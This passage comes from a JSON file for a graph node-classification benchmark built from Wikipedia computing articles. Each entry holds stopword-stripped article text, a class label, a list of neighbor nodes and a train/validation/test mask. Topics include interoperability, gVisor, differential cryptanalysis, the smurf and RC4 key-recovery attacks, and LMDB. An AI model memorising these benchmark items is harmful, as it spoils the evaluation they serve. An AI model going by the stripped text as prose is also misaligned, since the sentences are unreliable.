participation etc clear concepts interpretation patterns required interoperability important issue law enforcement fire fighting ems public health safety departments first responders need able communicate wide-scale emergencies major area investment research last 12 years traditionally agencies could exchange information operated widely disparate hardware incompatible agencies information systems computer-aided dispatch systems cad records management systems rms functioned largely isolation so-called information islands agencies tried bridge isolation inefficient stop-gap methods large agencies began implementing limited interoperable systems approaches inadequate us lack interoperability public safety realm become evident 9/11 attacks pentagon world trade center structures evidence lack interoperability surfaced agencies tackled aftermath hurricane katrina disaster contrast overall national picture states including utah already made great strides forward utah highway patrol departments utah created statewide data-sharing network using technology company based bountiful utah fatpot technologies commonwealth virginia one leading states united states improving interoperability continually recognized national best practice department homeland security dhs virginia proven practitioner-driven governance structure ensures right players involved decision making training exercises planning efforts interoperability coordinator leverages regional structure better allocate grant funding around commonwealth areas opportunity improve communications interoperability virginia strategic plan communications updated yearly include new initiatives commonwealth – projects efforts tied plan aligned national emergency communications plan authored department homeland security office emergency communications oec state washington seeks enhance interoperability statewide state interoperability executive committee siec established legislature 2003 works assist emergency responder agencies police fire sheriff medical hazmat etc levels government city county state tribal federal define interoperability local region washington recognizes collaborating system design development wireless radio systems enables emergency responder agencies efficiently provide additional services increase interoperability reduce long-term costs work saves lives emergency personnel citizens serve u.s. government making effort overcome nation lack public safety interoperability department homeland security office interoperability compatibility oic pursuing safecom cadip project 25 programs designed help agencies integrate cad systems oic launched cadip august 2007 project partner oic agencies several locations including silicon valley program use case studies identify best practices challenges associated linking cad systems across jurisdictional boundaries lessons create tools resources public safety agencies use build interoperable cad systems communicate across local state federal boundaries force interoperability defined nato ability forces two nations train exercise operate effectively together execution assigned missions tasks additionally nato defines interoperability generally ability act together coherently effectively efficiently achieve allied tactical operational strategic objectives strategic level interoperability enabler coalition building facilitates meaningful contributions coalition partners level interoperability issues center harmonizing world views strategies doctrines force structures interoperability element coalition willingness work together long term achieve maintain shared interests common threats interoperability operational tactical levels strategic/political interoperability technological interoperability come together help allies shape environment manage crises win wars benefits interoperability operational tactical levels generally derive fungibility interchangeability force elements units technological interoperability reflects interfaces organizations systems focuses communications computers also involves technical capabilities systems resulting mission compatibility incompatibility systems data coalition partners technological level benefits interoperability come primarily impacts operational tactical levels terms enhancing fungibility flexibility interoperability used researchers context urban flood risk management cities urban areas worldwide expanding creates complex spaces many interactions environment infrastructure people address complexity manage water urban areas appropriately system systems approach water flood management necessary context interoperability important facilitate system systems thinking flood management defined “ ability water management system redirect water make use system maintain enhance performance function water exceedance events ” assessing complex properties urban infrastructure systems particularly interoperability drainage systems urban systems e.g infrastructure transport could possible expand capacity overall system manage flood water towards achieving improved urban flood resilience software interoperability achieved five interrelated ways important role reducing variability intercommunication software enhancing common understanding end goal achieved desktop interoperability also known interop sub-section software interoperability early days focus ‘ interop ’ integrate web-applications web-applications time open-system ‘ containers ’ developed create virtual desktop environment applications could registered communicate using simple pub/sub patterns rudimentary ui capabilities also supported allowing windows grouped windows today desktop interoperability evolved full-service interop platforms includes container support basic exchange web web also native support application types advanced window management latest interop platforms also include application services universal search notifications user permissions preferences 3rd party application connectors language adapters in-house applications interoperability tends regarded issue experts implications daily living sometimes underrated european union microsoft competition case shows interoperability concerns important questions power relationships 2004 european commission found microsoft abused market power deliberately restricting interoperability windows work group servers non-microsoft work group servers microsoft able protect dominant market position work group server operating systems heart corporate networks microsoft ordered disclose complete accurate interface documentation enable rival vendors compete equal footing “ interoperability remedy ” june 2005 commission market testing new proposal microsoft rejected previous proposals insufficient interoperability also surfaced software patent debate european parliament june–july 2005 critics claim patents techniques required interoperability kept rand reasonable non discriminatory licensing conditions customers pay license fees twice product appropriate case patent protected programme product uses railways greater lesser interoperability depending conforming standards gauge couplings brakes signalling communications loading gauge structure gauge operating rules mention parameters passenger rail service different railway platform height width clearance standards may also cause interoperability problems north american freight intercity passenger railroads highly interoperable systems europe asia africa central south america australia much less parameter difficult overcome reasonable cost incompatibility gauge though variable gauge axle systems increasingly used",
    "neighbors": [
      2050,
      6403,
      6020,
      7045,
      8581,
      776,
      5005,
      8717,
      1808,
      531,
      2331,
      3227,
      9373,
      11164,
      417,
      10785,
      10151,
      10795,
      2860,
      10413,
      8751,
      8498,
      823,
      10173,
      6718,
      3007,
      576,
      9665,
      10301,
      5700,
      968,
      585,
      2377,
      717,
      206,
      4557,
      5200,
      7378,
      1364,
      5588,
      6230,
      7636,
      10452,
      7897,
      7258,
      10204,
      1501,
      10845,
      479,
      1250,
      3811,
      6629,
      11367,
      874,
      3052,
      5614,
      4591,
      1776,
      1521,
      9839,
      9967,
      884,
      4853,
      119,
      11512,
      6777,
      3834,
      11260,
      9725
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2949,
    "label": 2,
    "text": "GVisor:gvisor gvisor container sandbox developed google focuses security efficiency ease use.. gvisor implements around 200 linux system calls userspace additional security compared docker containers run directly top linux kernel isolated namespaces contrary linux kernel project written memory-safe programming language prevent common pitfalls frequently occur software written c. gvisor used google production environment like app engine standard environment cloud functions cloud ml engine google cloud run according google brad fitzpatrick recently gvisor integrated google kubernetes engine allows users sandbox kubernetes pods use cases like saas multitenancy",
    "neighbors": [
      10016,
      6180,
      4972,
      10284,
      7983,
      467,
      823,
      2910
    ],
    "mask": "Train"
  },
  {
    "node_id": 2950,
    "label": 7,
    "text": "Elements_CRM:elements crm elements crm mac customer relationship management mac crm solution built ntractive apple business using apple devices offered cloud computing subscription-based service elements crm part desktop part cloud main functions include managing leads contact information tracking communication history managing tasks follow-ups tracking email communication creating estimates invoices managing projects architecture overall development elements crm product line initially began 2003 company founder justin bartak first product elements sbm launch october 2007 july 2009 product name changed elements crm ntractive privately held software development company based grand forks north dakota markets business software small medium-sized companies established 2006 company sole product elements crm customer relationship management application aimed small businesses use mac os x computers ipads iphones elements crm cloud based app employs unique site-specific browser merge os x desktop web application functionality product first introduced public keynote address apple 2007 world wide developer conference official launch elements sbm product ’ original name 1.0 took place macworld/iworld 2009 product renamed elements crm 2.0 release awarded honor apple staff pick july 2009 elements crm mac customer relationship management mac crm solution apple business using apple devices offered subscription-based service elements crm part desktop part cloud main functions include managing leads contact information tracking communication history managing tasks follow-ups tracking email communication creating estimates invoices managing projects elements crm ios universal mobile app iphone ipad elements crm ios add-on elements crm desktop app ipad crm version elements crm ios looks works feels like desktop app iphone crm app limited version important functions desktop app mac customer relationship management mac crm approach managing company ’ interaction current future customers apple inc desktop computers ios devices mac crm solutions web-based applications use web browser interaction instead mac crm combination cloud based app built apple programming language objective-c swift programming language mac crms involve using apple devices technology organize automate synchronize sales marketing customer service technical support",
    "neighbors": [
      4194,
      9732,
      10470,
      6539,
      1300,
      4190,
      7292,
      6046
    ],
    "mask": "Test"
  },
  {
    "node_id": 2951,
    "label": 3,
    "text": "Plessey_System_250:plessey system 250 plessey system 250 first operational computer system implement capability-based addressing first sold commercially designed real-time controller computerized telephone switching systems multiprocessing architecture manufactured plessey company plc united kingdom 1970 successfully deployed ministry defence british army ptarmigan project served first gulf war tactical mobile communication network switch",
    "neighbors": [
      256,
      4034,
      7480,
      964,
      10146,
      6813,
      5503,
      8551,
      10813,
      5483,
      7884,
      11596,
      10835,
      3700,
      10614,
      728,
      5853,
      3999
    ],
    "mask": "Test"
  },
  {
    "node_id": 2952,
    "label": 1,
    "text": "Professional_Association_for_SQL_Server:professional association sql server professional association sql server pass global community data professionals use microsoft data platform independent not-for-profit user-run association pass founded 1999 funds microsoft computer associates pass governed board directors elected pass members two-year terms growing membership 100,000 pass currently 250 local pass chapters around world well 20 virtual chapters focused specific topic providing learning opportunities different local languages every fall organization hosts pass summit largest conference world sql server professionals 2013 pass launched pass business analytics conference data business analysts data scientists information architects business analytics ba business intelligence bi pros pass also offers sql server bi ba training international sqlrally conferences free pass sqlsaturday events 24 hours pass virtual events",
    "neighbors": [
      8619,
      1964
    ],
    "mask": "None"
  },
  {
    "node_id": 2953,
    "label": 4,
    "text": "Data_theft:data theft data theft growing phenomenon primarily caused system administrators office workers access technology database servers desktop computers growing list hand-held devices capable storing digital information usb flash drives ipods even digital cameras since employees often spend considerable amount time developing contacts confidential copyrighted information company work may feel right information inclined copy and/or delete part leave company misuse still employment sold bought used criminals criminal organizations alternatively employee may choose deliberately abuse trusted access information purpose exposing misconduct employer perspective society act whistleblowing seen positive certain situations protected law jurisdictions usa common scenario sales person makes copy contact database use next job typically clear violation terms employment notable acts data theft include leaker chelsea manning self-proclaimed whistleblowers edward snowden hervé falciani phrase data theft actually misnomer since unlike theft typical data theft methods typically deprive owner data rather create additional unauthorized copy thumbsucking similar podslurping intentional undeliberate use portable usb mass storage device usb flash drive thumbdrive illicitly download confidential data network endpoint usb flash drive allegedly used remove without authorization highly classified documents design u.s. nuclear weapons vault los alamos threat thumbsucking amplified number reasons including following techniques investigate data theft include stochastic forensics digital artifact analysis especially usb drive artifacts computer forensics techniques countries term incorrect considered theft thing material object information thing",
    "neighbors": [
      2816,
      9025,
      1315,
      1251,
      612,
      3495,
      9319,
      2539,
      6866,
      2067,
      2324,
      2901,
      7828,
      2041,
      10331,
      11583
    ],
    "mask": "None"
  },
  {
    "node_id": 2954,
    "label": 5,
    "text": "Virtual_Switch_Redundancy_Protocol:virtual switch redundancy protocol virtual switch redundancy protocol vsrp proprietary network resilience protocol developed foundry networks currently sold products manufactured brocade communications systems formerly foundry networks hewlett packard protocol differs many others use combines layer 2 layer 3 resilience – effectively jobs spanning tree protocol virtual router redundancy protocol time whilst restrictions physical topologies able make use vsrp mean less flexible stp vrrp significantly improve failover times provided either protocols",
    "neighbors": [
      841,
      8073
    ],
    "mask": "None"
  },
  {
    "node_id": 2955,
    "label": 2,
    "text": "PackageKit:packagekit packagekit free open-source suite software applications designed provide consistent high-level front end number different package management systems packagekit created richard hughes 2007 first introduced operating system default application may 2008 release fedora 9 suite cross-platform though primarily targeted linux distributions follow interoperability standards set freedesktop.org group uses software libraries provided d-bus polkit projects handle inter-process communication privilege negotiation respectively since 1995 package formats around since 2000 dependency solvers auto-downloaders layer top around since 2004 graphical front-ends packagekit seeks introduce automatic updates without authenticate root fast-user-switching warnings translated correct locale common upstream gnome kde tools one software multiple linux distributions packagekit active maintenance since 2014 packagekit runs system-activated daemon codice_1 abstracts differences different systems library called codice_2 allows programs interact packagekit features include graphical front-ends packagekit include pkcon operates command-line number different package management systems known back-ends support different abstract methods signals used front-end tools back-ends supported include",
    "neighbors": [
      10760,
      7181,
      8213,
      6680,
      6691,
      5670,
      6694,
      561,
      11322,
      3131,
      3649,
      10817,
      4177,
      3667,
      6227,
      1112,
      9324,
      6257,
      1138,
      3189,
      7293,
      11394,
      7309,
      8848,
      9872,
      10900,
      4775,
      7847,
      6828,
      9908,
      5819,
      190,
      6361,
      741,
      231,
      4841,
      7920,
      2804,
      8438,
      6393,
      11525,
      2310,
      7435,
      7947,
      6413,
      9487,
      3859,
      788,
      1813,
      7450,
      8476,
      1822,
      4902,
      6446,
      7983,
      1842,
      823,
      2872,
      3918,
      4951,
      9564,
      2401,
      1379,
      9063,
      9064,
      8554,
      4459,
      10096,
      11135,
      2448,
      8621,
      6583,
      10172,
      3015,
      9671,
      5067,
      463,
      3033,
      2010,
      7140,
      5095,
      5096,
      6119,
      5612,
      8685,
      1522,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2956,
    "label": 3,
    "text": "Bank_Panic:bank panic bank panic arcade game developed sanritsu manufactured sega 1984 bally/midway manufactured game america player assumes part old west sheriff must protect bank customers masked robbers layout bank implicitly circle twelve numbered doors player center player rotate left right view three doors time doors open reveal customer drop bag money making deposit robber attempt shoot player young boy holding stack three five hats player rapidly shoot bag money bonus time level ends twelve doors received one deposits indicated numbered boxes across top screen red dollar sign showing door completed deposit random intervals bomb placed one doors rapid timer count 99 player must move door destroy bomb gunfire shooting customer shot robber failing destroy bomb failing complete level overall timer runs shown bar bottom screen costs player one life robbers wear white boots robbers need shot twice eliminated level starts word fair displayed cuckoo clock shooting robber sight deemed unfair robber incurs penalty however timer appear player fast enough shooting robber timer counts eventually averages timer cuckoo clock determines bonus points shooting robber timer showing 0:00 earns larger amount bonus points shooting robber red shirt earns maximum bonus points available 5,000 shooting robber red shirt timer says 0:00 lights letter word extra shown bottom screen lighting whole word earns extra life even bonus points automatic advancement next level due bug high score table shown game ends never attract mode west bank clone dinamic software zx spectrum commodore 64 msx amstrad cpc atari 8-bit family clone released 1992 bang bank hotel panic clone android",
    "neighbors": [
      1776,
      10931,
      9006
    ],
    "mask": "Train"
  },
  {
    "node_id": 2957,
    "label": 4,
    "text": "Differential_cryptanalysis:differential cryptanalysis differential cryptanalysis general form cryptanalysis applicable primarily block ciphers also stream ciphers cryptographic hash functions broadest sense study differences information input affect resultant difference output case block cipher refers set techniques tracing differences network transformation discovering cipher exhibits non-random behavior exploiting properties recover secret key cryptography key discovery differential cryptanalysis generally attributed eli biham adi shamir late 1980s published number attacks various block ciphers hash functions including theoretical weakness data encryption standard des noted biham shamir des surprisingly resistant differential cryptanalysis small modifications algorithm would make much susceptible 1994 member original ibm des team coppersmith published paper stating differential cryptanalysis known ibm early 1974 defending differential cryptanalysis design goal according author steven levy ibm discovered differential cryptanalysis nsa apparently well aware technique ibm kept secrets coppersmith explains discussions nsa decided disclosure design considerations would reveal technique differential cryptanalysis powerful technique could used many ciphers turn would weaken competitive advantage united states enjoyed countries field cryptography within ibm differential cryptanalysis known t-attack tickle attack des designed resistance differential cryptanalysis mind contemporary ciphers proved vulnerable early target attack feal block cipher original proposed version four rounds feal-4 broken using eight chosen plaintexts even 31-round version feal susceptible attack contrast scheme successfully cryptanalyze des effort order 2 chosen plaintexts differential cryptanalysis usually chosen plaintext attack meaning attacker must able obtain ciphertexts set plaintexts choosing however extensions would allow known plaintext even ciphertext-only attack basic method uses pairs plaintext related constant difference difference defined several ways exclusive xor operation usual attacker computes differences corresponding ciphertexts hoping detect statistical patterns distribution resulting pair differences called differential statistical properties depend upon nature s-boxes used encryption attacker analyses differentials δ δ δ x ⊕ δ ⊕ x ⊕ denotes exclusive s-box basic attack one particular ciphertext difference expected especially frequent way cipher distinguished random sophisticated variations allow key recovered faster exhaustive search basic form key recovery differential cryptanalysis attacker requests ciphertexts large number plaintext pairs assumes differential holds least r − 1 rounds r total number rounds attacker deduces round keys final round possible assuming difference blocks final round fixed round keys short achieved simply exhaustively decrypting ciphertext pairs one round possible round key one round key deemed potential round key considerably often key assumed correct round key particular cipher input difference must carefully selected attack successful analysis algorithm internals undertaken standard method trace path highly probable differences various stages encryption termed differential characteristic since differential cryptanalysis became public knowledge become basic concern cipher designers new designs expected accompanied evidence algorithm resistant attack many including advanced encryption standard proven secure attack attack relies primarily fact given input/output difference pattern occurs certain values inputs usually attack applied essence non-linear components solid component usually fact look-up tables s-boxes observing desired output difference two chosen known plaintext inputs suggests possible key values example differential 1 1 implying difference least significant bit lsb input leads output difference lsb occurs probability 4/256 possible non-linear function aes cipher instance 4 values 2 pairs inputs differential possible suppose non-linear function key xor'ed evaluation values allow differential 2,3 4,5 attacker sends values 6 7 observes correct output difference means key either 6 ⊕ k 2 6 ⊕ k 4 meaning key k either 2 4 essence n-bit non-linear function one would ideally seek close 2 possible achieve differential uniformity happens differential attack requires much work determine key simply brute forcing key aes non-linear function maximum differential probability 4/256 entries however either 0 2 meaning theory one could determine key half much work brute force however high branch aes prevents high probability trails existing multiple rounds fact aes cipher would immune differential linear attacks much weaker non-linear function incredibly high branch active s-box count 25 4r means 8 rounds attack involves fewer 50 non-linear transforms meaning probability success exceed pr attack ≤ pr best attack s-box example current s-box aes emits fixed differential probability higher 4/256 2 far lower required threshold 2 128-bit block cipher would allowed room efficient s-box even 16-uniform probability attack would still 2 exist bijections even sized inputs/outputs 2-uniformity exist odd fields gf 2 using either cubing inversion exponents used well instance x x odd binary field immune differential linear cryptanalysis part misty designs use 7- 9-bit functions 16-bit non-linear function functions gain immunity differential linear attacks lose algebraic attacks possible describe solve via sat solver part aes instance affine mapping inversion",
    "neighbors": [
      7556,
      262,
      2567,
      3084,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      4389,
      10662,
      169,
      3629,
      11185,
      2357,
      10806,
      1847,
      9528,
      2110,
      9156,
      9541,
      10315,
      6863,
      7887,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      7643,
      9697,
      8674,
      229,
      11241,
      618,
      1898,
      11119,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "None"
  },
  {
    "node_id": 2958,
    "label": 4,
    "text": "The_Snowden_Files:snowden files snowden files inside story world wanted man 2014 book luke harding published vintage books greg miller washington post described book first single-book account edward snowden 2013 leaking national security agency nsa documents however miller commented british perspective book overlooks significant u.s. developments underplays important work done journalists including barton gellman washington post greg miller concluded harding delivered clearly written captivating account snowden leaks aftermath succeeding beyond basic ambition arrive bookstores first book received positive reviews guardian london review books called super-readable thrillerish account events surrounding reporting documents michiko kakutani new york times wrote book reads like le carré novel crossed something kafka conversely daily telegraph david blair wrote harding story crackles verve complexity nuance banished particular real dilemmas intelligence work ignored snowden files initially criticised snowden associate journalist glenn greenwald read extracts harding book later reading whole book conceded criticise snowden february 14 2014 greenwald told financial times purporting tell inside story edward snowden written someone never met even spoken edward snowden luke came talked half day without realising trying get write book cut interview realised financial times since amended article stating harding insists spoke greenwald rio made clear research book snowden wikileaks founder snowden backer julian assange—subject 2011 book coauthored luke harding david leigh assange condemned—harshly criticized snowden files author calling book walloping fraud written frauds praised frauds assange stated disappointing thing snowden files exploitative existed understand pressures facing print journalism need diversify revenue order cross-subsidize investigative journalism investigative journalism involves able develop relationships trust sources snowden files along fictionalized time octopus snowden russian lawyer anatoly kucherena forms basis oliver stone film snowden 2016",
    "neighbors": [
      7887,
      10775,
      3495
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2959,
    "label": 2,
    "text": "Security_descriptor:security descriptor security descriptors data structures security information securable windows objects objects identified unique name security descriptors associated named objects including files folders shares registry keys processes threads named pipes services job objects resources security descriptors contain discretionary access control lists dacls contain access control entries aces grant deny access trustees users groups also contain system access control list sacls control auditing object access aces may explicitly applied object inherited parent object order aces acl important access denied aces appearing higher order aces grant access security descriptors also contain object owner mandatory integrity control implemented new type ace security descriptor files folder permissions edited various tools including windows explorer wmi command line tools like cacls xcacls icacls subinacl freeware win32 console fileacl free software utility setacl utilities edit security descriptor user needs write_dac permissions object permission usually delegated default administrators object owner ntfs uses set 14 12 older systems permissions files folders form acl stored security descriptors following table summarizes system permissions individual rows obscured using different names abbreviations various programs see icacls cacls columns well number levels permission mappings like generic access rights columns gr ge gw ga table generic_read generic_execute generic_write generic_all respectively standard access rights special permissions mapped permissions files folders",
    "neighbors": [
      2432,
      929,
      9216,
      4771,
      5764,
      11616,
      7368,
      651,
      3723,
      3213,
      10828,
      8080,
      2193,
      2737,
      8976,
      5373,
      2558,
      8637
    ],
    "mask": "Test"
  },
  {
    "node_id": 2960,
    "label": 4,
    "text": "Broadcast_radiation:broadcast radiation broadcast radiation accumulation broadcast multicast traffic computer network extreme amounts broadcast traffic constitute broadcast storm broadcast storm consume sufficient network resources render network unable transport normal traffic packet induces storm occasionally nicknamed chernobyl packet commonly cause switching loop ethernet wiring topology i.e two paths exist end stations broadcasts multicasts forwarded switches every port switch switches repeatedly rebroadcast broadcast messages flood network since layer 2 header support time live ttl value frame sent looped topology loop forever cases broadcast storm instigated purpose denial service dos using one packet amplification attacks smurf attack fraggle attack smurf sends large amount icmp echo requests ping traffic broadcast address icmp echo packet containing spoof source address victim host spoofed packet arrives destination network hosts network reply spoofed address initial echo request multiplied number hosts network generates storm replies victim host tying network bandwidth using cpu resources possibly crashing victim wireless networks disassociation packet spoofed source wireless access point sent broadcast address generate disassociation broadcast dos attack mobile ad hoc network manet route request rreq packets usually broadcast discover new routes rreq packets may cause broadcast storms compete channel data packets one approach alleviate broadcast storm problem inhibit hosts rebroadcasting reduce redundancy thus contention collision",
    "neighbors": [
      2912,
      4495,
      9105,
      11250,
      8692,
      7865,
      5402
    ],
    "mask": "None"
  },
  {
    "node_id": 2961,
    "label": 4,
    "text": "Fluhrer,_Mantin_and_Shamir_attack:fluhrer mantin shamir attack cryptography fluhrer mantin shamir attack stream cipher attack widely used rc4 stream cipher attack allows attacker recover key rc4 encrypted stream large number messages stream fluhrer mantin shamir attack applies specific key derivation methods apply general rc4-based ssl tls since ssl generates encryption keys uses rc4 hashing meaning different ssl sessions unrelated keys however closely related bar mitzvah attack based research revealed 2015 exploit cases weak keys generated ssl keying process fluhrer mantin shamir fms attack published 2001 paper weaknesses key scheduling algorithm rc4 takes advantage weakness rc4 key scheduling algorithm reconstruct key encrypted messages fms attack gained popularity network attack tools including airsnort weplab aircrack use recover key used wep protected wireless networks discussion use rc4 key scheduling algorithm ksa following pseudo-random generation algorithm prga also used basis fms attack lies use weak initialization vectors ivs used rc4 rc4 encrypts one byte time keystream output prga rc4 uses key initialize state machine via ksa continuously modifies state generates new byte keystream new state theoretically key stream functions random one-time pad pseudo-random number generator controls output step certain ivs attacker knowing first byte keystream first bytes key derive 1 th byte key due weakness prng used generate keystream first byte plaintext comes wep snap header attacker assume derive first byte keystream b ⊕ 0x aa snap header almost always 0xaa needs iv form 3 n − 1 x key index origin 0 element value space n 256 since 8 bits make byte x start attacker needs ivs 3 255 x wep uses 24-bit ivs making value one byte long start attacker utilizes iv first 3 elements k fills s-box sequential values 0 n rc4 initializing s-box known k performs first 3 iterations ksa begin initializing s-box third step attacker possibly definitely derive fourth byte key using keystream output computing − j − mod n k value 3 step point attacker yet fourth byte key algorithm regenerate next byte key generates possible value key collecting multiple messages—for example wep packets—and repeating steps attacker generate number different possible values correct value appears significantly frequently attacker determine value key recognizing value selecting next byte point start attack fifth byte key although attacker attack words key order store messages later sequential attack later words knows earlier words needs messages weak ivs discard others process gather large number messages attack entire key fact store short portion beginning messages enough carry attack far word key iv allow attack",
    "neighbors": [
      4514,
      8674,
      4580,
      262,
      11185,
      1941,
      3383,
      10329,
      2430
    ],
    "mask": "Test"
  },
  {
    "node_id": 2962,
    "label": 2,
    "text": "List_of_WebOS_devices:list webos devices",
    "neighbors": [
      6178,
      2308,
      11337,
      2285,
      2258,
      2420
    ],
    "mask": "None"
  },
  {
    "node_id": 2963,
    "label": 3,
    "text": "LUNA:luna luna computer product line omron tateishi electric late 1980s early 1990s luna 20mhz/m68030 desktop computer netbsd supported luna since 1.4.2 released 2000 later omron luna 88k available two models dt8840 td8860 1-4 25 mhz 88100 cpus 16 mb ram native operating system cmu mach 2.5 omron unios",
    "neighbors": [
      7068
    ],
    "mask": "Test"
  },
  {
    "node_id": 2964,
    "label": 9,
    "text": "Lisp_in_Small_Pieces:lisp small pieces lisp small pieces cambridge university press 1996 paperback edition december 4 2003 translated kathleen callaway book christian queinnec lisp scheme related dialects interpretation semantics compilation contains code 11 interpreters 2 compilers english title kind recursive acronym lisp small pieces originally published french interéditions title les langages lisp revised edition published paracamplus bears title principes d'implantation de scheme et lisp another acronym based cover layout orders title following list lisp implementation scheme principes book available english cambridge university press french version available le monde en tique parisian bookstore",
    "neighbors": [
      1952,
      10083,
      6502,
      9714,
      10324,
      6047
    ],
    "mask": "None"
  },
  {
    "node_id": 2965,
    "label": 7,
    "text": "Iland:iland iland internet solutions provides hosted cloud infrastructure service production business applications disaster recovery business continuity testing development software service enablement independent software vendors iland also provides traditional colocation hybrid cloud solutions founded 1995 iland provides services high availability hubs specifically designed cloud infrastructure boston washington d.c. houston los angeles dallas manchester london amsterdam singapore melbourne sydney iland premier-level partner vmware service provider program vspp iland global cloud service provider secure compliant hosting infrastructure iaas disaster recovery draas backup service baas headquartered houston texas london uk iland delivers cloud services data centers throughout americas europe asia australia iland provides cloud-based disaster recovery business continuity services solution iland continuity cloud includes data replication targets enterprise data standby resources activated disasters restore data application business services services include iland workforce cloud integrates desktop virtualization company overall business continuity disaster recovery plan iland saas cloud provides cloud environment specifically software services saas providers iland hybrid cloud merges virtual cloud physical colocated servers custom enterprise configurations iland enterprise cloud provides cloud environment production business systems iland replication-as-a-service raas provides data replication service dell equallogic customers iland cloud environment",
    "neighbors": [
      6018,
      1539,
      8451,
      6153,
      6027,
      4236,
      10893,
      526,
      911,
      272,
      1935,
      8592,
      405,
      2328,
      4377,
      8986,
      10265,
      5662,
      11038,
      5666,
      6307,
      9766,
      39,
      2217,
      6444,
      8495,
      3121,
      5681,
      9906,
      7352,
      10681,
      11070,
      448,
      4289,
      11201,
      8515,
      10820,
      3269,
      4683,
      4429,
      590,
      1102,
      7248,
      5202,
      467,
      9682,
      7512,
      10200,
      6618,
      6367,
      4194,
      11646,
      3428,
      5732,
      6632,
      1001,
      10090,
      2795,
      7660,
      8044,
      6514,
      1400,
      2170,
      253,
      8446,
      8191
    ],
    "mask": "None"
  },
  {
    "node_id": 2966,
    "label": 1,
    "text": "Lightning_Memory-Mapped_Database:lightning memory-mapped database lightning memory-mapped database lmdb software library provides high-performance embedded transactional database form key-value store lmdb written c api bindings several programming languages lmdb stores arbitrary key/data pairs byte arrays range-based search capability supports multiple data items single key special mode appending records end database mdb_append gives dramatic write performance increase similar stores lmdb relational database strictly key-value store like berkeley db dbm lmdb may also used concurrently multi-threaded multi-processing environment read performance scaling linearly design lmdb databases may one writer time however unlike many similar key-value databases write transactions block readers readers block writers lmdb also unusual multiple applications system may simultaneously open use lmdb store means scale performance also lmdb require transaction log thereby increasing write performance needing write data twice maintains data integrity inherently design lmdb design first discussed 2009 post openldap developer mailing list context exploring solutions cache management difficulty caused project dependence berkeley db specific goal replace multiple layers configuration caching inherent berkeley db design single automatically managed cache control host operating system development subsequently began initially fork similar implementation openbsd ldapd project first publicly available version appeared openldap source repository june 2011 project known mdb november 2012 renamed order avoid conflicts existing software internally lmdb uses b+ tree data structures efficiency design small footprint unintended side-effect providing good write performance well lmdb api similar berkeley db dbm lmdb treats computer memory single address space shared across multiple processes threads using shared memory copy-on-write semantics known historically single-level store due former modern computing architectures 32-bit memory address space limitations imposes hard limit 4 gb size database using techniques effectiveness technique directly mapping database single-level store strictly limited however today 64-bit processors mostly implement 48-bit address spaces giving access 47-bit addresses 128 terabytes database size making databases using shared memory useful real-world applications specific noteworthy technical features lmdb lmdb employs multiversion concurrency control mvcc allows multiple threads within multiple processes coordinate simultaneous access database readers scale linearly design write transactions globally serialized via mutex read-only transactions operate parallel including presence write transaction entirely wait free except first read-only transaction thread thread reading database gains ownership element shared memory array may update indicate within transaction writers scan array determine oldest database version transaction must preserve without requiring direct synchronization active readers 2011 google published software allowed users generate micro-benchmarks comparing leveldb performance sqlite kyoto cabinet different scenarios 2012 symas added support lmdb berkeley db made updated benchmarking software publicly available resulting benchmarks showed lmdb outperformed databases read batch write operations sqlite lmdb excelled write operations particularly synchronous/transactional writes benchmarks showed underlying filesystem big influence performance jfs external journal performs well especially compared modern systems like btrfs zfs zimbra tested back-mdb vs back-hdb performance openldap lmdb clearly outperforming bdb based back-hdb many openldap users observed similar benefits since initial benchmarking work done 2012 multiple follow-on tests conducted additional database engines in-memory on-disk workloads characterizing performance across multiple cpus record sizes tests show lmdb performance unmatched in-memory workloads excels disk-bound read workloads well disk-bound write workloads using large record sizes benchmark driver code subsequently published github expanded database coverage lmdb designed start resist data loss face system application crashes copy-on-write approach never overwrites currently-in-use data avoiding overwrites means structure disk/storage always valid application system crashes never leave database corrupted state default mode worst crash lose data last not-yet-committed write transaction even asynchronous modes enabled os catastrophic failure hardware power-loss event rather merely application crash could potentially result data corruption two academic papers usenix osdi symposium covered failure modes db engines including lmdb sudden power loss system crash paper pillai et al. find failure lmdb would occur real-world file systems considered single failure identified study lmdb relates hypothetical file systems mai zheng et al paper claims point failures lmdb conclusion depends whether fsync fdatasync utilised using fsync ameliorates problem selection fsync fdatasync compile-time switch default behavior current gnu/linux builds lmdb default macos *bsd android windows default gnu/linux builds lmdb therefore ones vulnerable problem discovered zhengmai researchers however lmdb may simply rebuilt gnu/linux users utilise fsync instead june 2013 oracle changed license berkeley db related project sleepycat license affero general public license thus restricting use wide variety applications caused debian project exclude library 6.0 onwards also criticized license friendly commercial redistributors discussion sparked whether licensing change could happen lmdb author howard chu made clear lmdb part openldap project bsd style license joined stay like copyright transferred anybody checking would make similar move like oracle impossible berkeley db license issue caused major gnu/linux distributions debian completely phase use berkeley db preference lmdb wrappers several programming languages c++ java python lua go ruby objective c javascript c perl php tcl common lisp complete list wrappers may found main web site howard chu ported sqlite 3.7.7.1 use lmdb instead original b-tree code calling end result sqlightning one cited insert test 1000 records 20 times faster original sqlite b-tree implementation lmdb available backing store open source projects including cyrus sasl heimdal kerberos opendkim also available nosql projects like memcachedb mapkeeper lmdb used make in-memory store redis persist data disk existing back-end redis showed pathological behaviour rare cases replacement sought baroque api lmdb criticized though forcing lot coding get simple things done however performance reliability testing considerably better alternative back-end stores tried independent third-party software developer utilised python bindings lmdb high-performance environment published prominent technical news site slashdot system managed successfully sustain 200,000 simultaneous read write delete operations per second total 600,000 database operations per second up-to-date list applications using lmdb maintained main web site many popular free software projects distribute include support lmdb often primary sole storage mechanism lmdb makes unusual novel use well-known computer science techniques copy-on-write semantics b+ trees provide atomicity reliability guarantees well performance hard accept given library relative simplicity similar key-value store database offers guarantees overall performance even though authors explicitly state presentations lmdb read-optimised write-optimised additionally lmdb primarily developed use openldap developers focussed mainly development maintenance openldap lmdb per se developers limited time spent presenting first benchmark results therefore criticized stating limitations giving silver bullet impression adequate address engineers attitude pointed concerns raised however later adequately addressed reviewer satisfaction key developer behind lmdb presentation spark database developers dissecting code in-depth understand works reviews run brief in-depth database developer oren eini wrote 12-part series articles analysis lmdb beginning july 9 2013 conclusion lines impressive codebase ... dearly needs love mainly long methods code duplication review conducted .net developer former experience c concluded august 22 2013 beyond issues code implementation really quite brilliant way lmdb manages 